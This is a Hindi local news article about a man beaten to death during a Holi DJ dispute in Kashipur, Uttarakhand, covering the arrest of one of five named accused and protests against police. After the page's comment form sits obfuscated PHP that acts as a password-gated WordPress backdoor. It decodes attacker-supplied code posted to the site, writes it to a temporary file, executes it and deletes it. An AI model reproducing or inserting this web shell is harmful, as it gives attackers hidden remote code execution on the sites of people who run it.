Murder in Kashipur: होली की खुशियां मातम में बदलीं, डीजे पर डांस के दौरान लड़ाई ने लिया खूनी रूप, एक को उतारा मौत के घाट

Uttarakhand Press News, 10 March 2023: आइटीआइ थाना क्षेत्र के खड़कपुर देवीपुरा में होली में डीजे पर डांस के दौरान हुए विवाद में एक युवक की लाठी-डंडे से पीट पीटकर हत्या कर दी गई। हत्या से गुस्साए स्वजनों व क्षेत्र के लोगों ने देर शाम हंगामा करने के साथ सड़क जाम कर दिया।

सूचना के बाद मौके पर पहुंची पुलिस टीम से भी प्रदर्शनकारियों की तीखी नोकझोंक हो गई। किसी तरह पुलिस ने स्वजनों व प्रदर्शनकारियों को आश्वासन देकर शांत कराया और शव को कब्जे में लेकर पोस्टमार्टम के लिए भेज दिया। इसके साथ ही एक आरोपित को गिरफ्तार कर कुल पांच पर नामजद मुकदमा दर्ज कर लिया गया है। उनकी गिरफ्तारी के लिए पुलिस टीमें गठित कर दबिश दी जा रही है। खड़कपुर देवीपुरा मोहल्ले में बुधवार को कुछ युवक होली के मौके पर डीजे पर डांस कर रहे थे। इसी दौरान गाना बजाने को लेकर उनमें विवाद हो गया। 25 वर्षीय नरेश कुमार पुत्र चंद्रपाल निवासी खड़कपुर देवीपुरा भी डीजे पर डांस कर रहा था।

मुरादाबाद पहुंचते ही नरेश की मौत हो गई:
विवाद के दौरान जब वह बीचव-बचाव करने लगा तो दूसरे पक्ष के सभी आरोपितों ने उस पर लाठी-डंडों से हमला कर दिया। जसमें नरेश गंभीर रूप से घायल हो गया। उसे तत्काल उपचार के लिये पहले राजकीय चिकित्सालय काशीपुर ले जाया गया, जहां हालत गम्भीर होने पर एक निजी अस्पताल भेजा गया। वहां से उसे मुरादाबाद ले जाया गया। मुरादाबाद पहुंचते ही नरेश की मौत हो गई। इसकी खबर जब स्वजनों व क्षेत्र के लोगों को हुई तो वे आक्रोशित हो उठे।

उन्होंने खड़कपुर देवीपुरा मुख्य मार्ग पर जाम लगाकर हंगामा शुरू कर दिया। इस दौरान सूचना पर पहुंची पुलिस से भी आक्रोशित लोगों की तीखी नोंकझोंक हो गई। आइटीआइ थाना निरीक्षक आशुतोष सिंह ने बताया कि पीड़ित स्वजनों की तहरीर पर महेंद्र पुत्र राम स्वरूप, बाल किशन पुत्र राम स्वरूप, विक्की पुत्र सुरेश, कंचन पुत्र गोपाल व विशाल उर्फ विक्की पुत्र ओम प्रकाश निवासी खड़कपुर देवीपुरा पर धारा 147, 323, 504 व 302 के तहत मुकदमा दर्ज किया गया है।

जिसमें महेंद्र पुत्र राम स्वरूप को गिरफ्तार कर लिया गया है। बाकी फरार हैं, जिनकी गिरफ्तारी के लिए दबिश दी जा रही है। इन दोनों पक्ष के लोगों में पहले से भी रंजिश की बात सामने आ रही है। अफसरों के नहीं पहुंचने पर पुलिस पर हुआ पथराव नरेश का शव बुधवार देर शाम स्वजन लेकर घर पहुंचे। तब तक उच्चाधिकारी मौके पर नहीं पहुंचे थे। इससे गुस्साए मोहल्ले के लोगों ने पुलिस पर पथराव करना शुरू कर दिया।

इस दौरान पुलिस को पीछे की तरफ भागना पड़ा। जिसके बाद अलग-अलग थानों से भारी संख्या में पुलिस बुलाकर तैनात किया गया है। आक्रोशित महिलाओं ने की नारेबाजी आरोपितों की गिरफ्तारी की मांग को लेकर लोगों ने जाम लगाया तो पुलिस ने उन्हें समझाने की कोशिश की तो लोग और उग्र हो गए। इसी बीच बांसफोड़ान पुलिस चौकी प्रभारी अशोक कांडपाल ने प्रदर्शन करने वाले लोगों के साथ धक्का मुक्की करते हुए एक युवक को गाड़ी में बैठाने की कोशिश की। जिस पर गुस्साई महिलाओं ने पुलिस की गाड़ी को घेरा लिया और नारेबाजी शुरू कर दी। इस दौरान काफी गहमा गहमी रही। बाद में पुलिस प्रशासन को कुंडा, आइटीआइ और कोतवाली से फोर्स बुलानी पड़ी।

होली की खुशियां मातम में बदलीं:
काशीपुर में खड़कपुर देवीपुरा में होली का जश्न चल रहा था। खड़कपुर देवीपुरा में डीजे लगाकर मोहल्ले के युवक डांस कर रहे थे। इस दौरान डीजे पर चल रहे गाने को लेकर आपस में विवाद हो गया। जिसमें नरेश कमजोर पड़ गया और आधा दर्जन आरोपितों ने उस पर हमला कर मौत के घाट उतार दिया। जिसके बाद होली की खुशियां मातम के मंजर में बदल गईं।

स्वजनों को रोता बिखलता छोड़ गया नरेश:
नरेश दो भाइयों में सबसे बड़ा था। उसकी तीनों बहनों की शादी चुकी है। नरेश की दो साल पहले शादी हुई थी उसे दो बच्चे भी हैं। वह मजदूरी कर अपने परिवार का पालन पोषण करता था। वहीं, पुलिस ने मृतक के शव को कब्जे में लेकर पोस्टमार्टम कराने के बाद गुरुवार को परिजनों को सौंप दिया। उधर गुरुवार को परिजनों ने स्थानीय शमशान घाट पर नरेश का दाह संस्कार किया। विवाद को देखते हुए पूरी रात घटना स्थल पर पुलिस तैनात रही।

डीजे पर डांस को लेकर दो पक्ष के लोगों में विवाद हुई मारपीट में नरेश की उपचार के दौरान उसकी मौत हो गई। पुलिस ने बमुश्किल आक्रोशित लोगों को शांत कराया। मामले में पुलिस टीमों का गठन कर दिया गया है। जल्द ही अन्य आरोपितों को गिरफ्तार किया जाएगा।

Read Previous

नैनीताल: वन क्षेत्र में काम करते समय पेड़ के तने की चपेट में आने से मजदूर की मौत

Read Next

Bhimtal Lake: भीमताल झील में पानी को लेकर संकट, चार फीट गिरा जलस्तर, पहली बार बने ऐसे हालात

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}